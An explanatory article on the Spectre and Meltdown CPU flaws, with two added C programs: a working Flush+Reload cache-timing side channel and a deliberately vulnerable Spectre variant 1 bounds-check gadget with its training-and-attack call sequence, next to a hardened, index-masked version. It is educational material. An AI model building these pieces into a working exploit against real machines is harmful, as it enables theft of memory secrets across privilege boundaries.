SPECTRE AND MELTDOWN
What Is Spectre and Meltdown?
Spectre and Meltdown are two vulnerabilities that affect nearly every processor manufactured in the last 20 years. On 1 June 2017, researchers at Google Project Zero discovered these two major security flaws in modern processors and reported them privately to the processor vendors; the flaws became public early in 2018 and were a major topic at the Consumer Electronics Show 2018. Both bugs are caused by a technique called speculative execution, which is widely used to boost the performance of modern processors.
What Is Speculative Execution?
Speculative execution is a technique used in modern processors to improve their performance enormously. Rather than waiting for a slow operation (a memory load, or a branch whose condition is not yet known) to finish, the CPU guesses the likely outcome and runs the instructions that would follow it, keeping the results ready. If the guess was right, the work is already done and the CPU responds quickly; if it was wrong, the results are thrown away and the CPU restarts from the correct point. The catch is that the work is done before it is known whether it was actually needed, or even allowed. The discarded results never become visible to the program, but the data they touched stays in the CPU's cache, and that leftover cache state is what Spectre and Meltdown exploit.
Meltdown
The operating system keeps sensitive information in a protected area of main memory, and the CPU makes sure that no ordinary program is allowed to read from that area; only the operating system can. But while instructions are executed out of order and speculatively, this rule is not enforced until the read instruction actually retires, and that gap leaves room for an exploit.
Let's take an example:
Imagine the user's login details are stored in the protected memory. A program requests that memory from the CPU, and the CPU refuses the operation. So the program tricks the CPU another way. Take this piece of code:
    if (password[0] == 'C') {
        load pic.jpg;    /* pic.jpg ends up in the cache */
    }
Architecturally the read of the password is forbidden: the CPU raises an exception on that instruction and the program never receives the value. But modern processors run ahead out of order, and the permission check is only enforced when the instruction retires. By then the CPU has already fetched the password byte, evaluated the condition and, if it was true, loaded pic.jpg into the cache. The exception discards all of those results, so the program is never told the value, but pic.jpg is still sitting in the cache. Now the program does the tricky part: it loads pic.jpg itself and measures how long that takes. If the time is significantly low, pic.jpg was already in the cache, which means the condition was true and the first letter is 'C'. Otherwise the speculative path never loaded pic.jpg and it had to come from main memory. Repeating this for every candidate letter and every position lets an attacker read the protected memory byte by byte; a real exploit skips the comparison and uses the secret byte directly as an index into an array of 256 separate cache lines, so one timing pass reveals a whole byte. This is called Meltdown.
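The timing trick in the pic.jpg story above (and the leftover cache state described under What Is Speculative Execution?) is a Flush+Reload cache side channel. The following C program is an added example, not code from the original post: it builds the 256-line "probe array" that a real Meltdown exploit uses in place of pic.jpg, flushes it, lets a transmitter touch one line selected by a constructed secret byte, then times every line and picks the fastest. The transmitter's access is a normal, non-speculative load here, so the program shows only the channel, not the forbidden read itself; the secret string "Hello", the page-sized stride and the round count are assumptions for illustration. It needs an x86 processor for the clflush and rdtscp instructions (on other architectures it only runs the self-check) and compiles with gcc or clang.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#define HAVE_X86_CACHE_TIMING 1
#else
#define HAVE_X86_CACHE_TIMING 0
#endif

/* One "pic.jpg" per possible byte value. A stride of one page keeps the 256
 * lines far apart so the hardware prefetcher does not pull in neighbours. */
#define STRIDE 4096
static uint8_t probe[256 * STRIDE];

/* Flush: evict all 256 candidate lines from the cache before each trial. */
static void flush_probe(void) {
#if HAVE_X86_CACHE_TIMING
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe[i * STRIDE]);
    _mm_mfence();
#endif
}

/* Transmitter: touch exactly one line, chosen by the secret byte. In Meltdown
 * this access happens transiently on the forbidden path; here it is a normal
 * access so the channel itself can be observed in isolation. */
static void transmit(uint8_t secret) {
    volatile uint8_t *line = &probe[secret * STRIDE];
    uint8_t v = *line;
    (void)v;
}

/* Reload: time a single access. rdtscp waits for earlier instructions to
 * finish; the lfence after it stops later ones starting early, so only the
 * probed load sits between the two timestamps. Hit: tens of cycles, miss: hundreds. */
static uint64_t time_access(volatile uint8_t *p) {
#if HAVE_X86_CACHE_TIMING
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    _mm_lfence();
    uint8_t v = *p;
    uint64_t t1 = __rdtscp(&aux);
    _mm_lfence();
    (void)v;
    return t1 - t0;
#else
    (void)p;
    return 0;
#endif
}

/* Time all 256 lines in a scrambled order so the sweep itself does not train the prefetcher. */
static void reload_all(uint64_t times[256]) {
    for (int i = 0; i < 256; i++) {
        int j = (i * 167 + 13) & 255;      /* 167 is odd, so every index is visited once */
        times[j] = time_access(&probe[j * STRIDE]);
    }
}

/* Decode: the line that came back fastest is the one the transmitter touched. */
int fastest_line(const uint64_t times[256]) {
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (times[i] < times[best]) best = i;
    return best;
}

/* Self-check on a constructed timing vector (not a measurement): every line
 * looks like a cache miss (300 cycles) except the line for 'H' (40 cycles). */
int demo_decode(void) {
    uint64_t times[256];
    for (int i = 0; i < 256; i++) times[i] = 300;
    times['H'] = 40;
    return fastest_line(times);
}

int main(void) {
    if (!HAVE_X86_CACHE_TIMING) {
        puts("cache timing demo needs x86 clflush/rdtscp; running self-check only");
        return demo_decode() == 'H' ? 0 : 1;
    }
    const char *msg = "Hello";  /* constructed secret to leak through the cache */
    for (size_t k = 0; k < strlen(msg); k++) {
        int votes[256] = {0};
        for (int round = 0; round < 200; round++) {   /* majority vote smooths noise */
            uint64_t times[256];
            flush_probe();
            transmit((uint8_t)msg[k]);
            reload_all(times);
            votes[fastest_line(times)]++;
        }
        int best = 0;
        for (int i = 1; i < 256; i++) if (votes[i] > votes[best]) best = i;
        printf("byte %zu: '%c' (%d/200 rounds agreed)\n", k, best, votes[best]);
    }
    return 0;
}
```

On a quiet machine each byte of the constructed secret wins most of the 200 rounds; inside a busy virtual machine the hit/miss gap narrows and the vote becomes noisier, which is why real exploits repeat each measurement many times. The only thing Meltdown adds to this program is that the transmit step is a load from protected memory that the CPU executes before its permission check catches up.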
Spectre
Spectre is also a vulnerability that abuses speculative execution, but it can be used to read data from a program's own memory space, or from another program, not only from the operating system's protected memory. The CPU uses a technique called branch prediction to learn the patterns of the branches it executes and guess which way each one will go next.
Let's take an example:
Imagine that most of the time you open My Computer you then open disk D. The CPU notices this pattern, so the next time you open My Computer it speculatively starts fetching the data for disk D into the cache to give you fast access. This time you do not go to disk D, so the speculative work is thrown away, but the data it fetched stays in the cache, which is shared, and an attacker can tell that it was fetched by using a side channel (cache timing) attack. In a real attack the attacker first trains the predictor, for example by calling a function with many valid array indices so that its bounds check is predicted to pass, and then calls it with an index that points outside the array at the secret. The check fails architecturally, but speculatively the secret byte is read and leaves its trace in the cache. Spectre is hard to overcome because it is a hardware-level vulnerability in the way the processor itself is designed; fully fixing it means changing the processor architecture.
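The bounds-check scenario just described is the Spectre variant 1 pattern. The following C code is an added example, not code from the original post: a constructed victim function with exactly that check, the attacker's calling pattern (train with in-bounds indices, then one out-of-bounds call), and a hardened version of the same function that clamps the index with a branchless mask so that even the speculative load stays inside the array. The buffer, the secret string and the function names are hypothetical; the masking technique is the one used by the Linux kernel's array_index_mask_nospec(). The code does not perform the cache measurement itself; it shows what the vulnerable gadget looks like and how the code-level fix changes it.

```c
#include <stddef.h>
#include <stdint.h>

/* Constructed victim memory layout (hypothetical): a small public buffer the
 * attacker is allowed to index, and a secret it must never read. */
#define PUBLIC_LEN 16
static uint8_t public_data[PUBLIC_LEN] = "0123456789abcde";
static const char secret[] = "attacker must not read this";
static uint8_t probe_array[256 * 4096];   /* one page per possible byte value */

/* Vulnerable bounds-checked gadget (Spectre variant 1 pattern).
 * Architecturally, x >= PUBLIC_LEN reads nothing. Speculatively, a branch
 * predictor trained on in-bounds calls predicts "in bounds" for the next call
 * too, the out-of-bounds byte is fetched, and the dependent access to
 * probe_array leaves a cache footprint that encodes its value. */
void victim_vulnerable(size_t x) {
    if (x < PUBLIC_LEN) {
        uint8_t v = public_data[x];
        probe_array[v * 4096] += 1;
    }
}

/* Branchless clamp mask: all ones when index < size, zero otherwise (the same
 * idea as the Linux kernel's array_index_mask_nospec()). No branch means there
 * is nothing for the predictor to mispredict, so the masked index is in bounds
 * even while the CPU is still speculating past the comparison. */
size_t array_index_mask_nospec(size_t index, size_t size) {
    /* top bit of (index | (size-1-index)) is set exactly when index >= size */
    size_t oob = (index | (size - 1 - index)) >> (sizeof(size_t) * 8 - 1);
    return (size_t)0 - (oob ^ 1);
}

size_t safe_index(size_t x, size_t len) {
    return x & array_index_mask_nospec(x, len);
}

/* Hardened gadget: same check, but the index used for the load is clamped, so
 * an out-of-bounds x becomes 0 on both the real and the speculative path. */
void victim_hardened(size_t x) {
    if (x < PUBLIC_LEN) {
        x = safe_index(x, PUBLIC_LEN);
        uint8_t v = public_data[x];
        probe_array[v * 4096] += 1;
    }
}

/* The attacker's out-of-bounds index: distance from public_data to the secret. */
size_t malicious_index(void) {
    return (size_t)((uintptr_t)secret - (uintptr_t)public_data);
}

/* The calling pattern from the text: many in-bounds calls to train the
 * predictor, then one call with the malicious index. With the vulnerable
 * gadget that last call transiently reads secret[0] and touches the matching
 * probe_array page; with the hardened one the load index is forced to 0. */
void attack_sequence(void (*victim)(size_t)) {
    for (int i = 0; i < 30; i++)
        victim((size_t)(i % PUBLIC_LEN));
    victim(malicious_index());
}

int main(void) {
    attack_sequence(victim_vulnerable);
    attack_sequence(victim_hardened);
    return 0;
}
```

Recovering the byte after attack_sequence(victim_vulnerable) would use the same flush-and-reload timing over probe_array as the cache side channel shown in the Meltdown section; after attack_sequence(victim_hardened) there is nothing to recover, because the only page ever touched is the one for public_data[0]. An lfence speculation barrier inside the if body is the other common fix, at a higher performance cost than the mask.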
Stay Safe
The root cause of these vulnerabilities is speculative execution, but it boosts CPU performance enormously, so simply removing it is not a good option. Most hardware manufacturers and operating system developers have now released security updates and patches: operating systems isolate kernel memory from user programs (kernel page-table isolation) to block Meltdown, and microcode and compiler changes limit how branch prediction can be abused for Spectre. These software fixes for a hardware-level problem are not complete and cost some performance, but something is better than nothing. In the future, hardware manufacturers will design their microprocessors to minimise these threats. AMD processors are already protected from Meltdown, because they do not let a speculative load from protected memory proceed, but they are still affected by Spectre.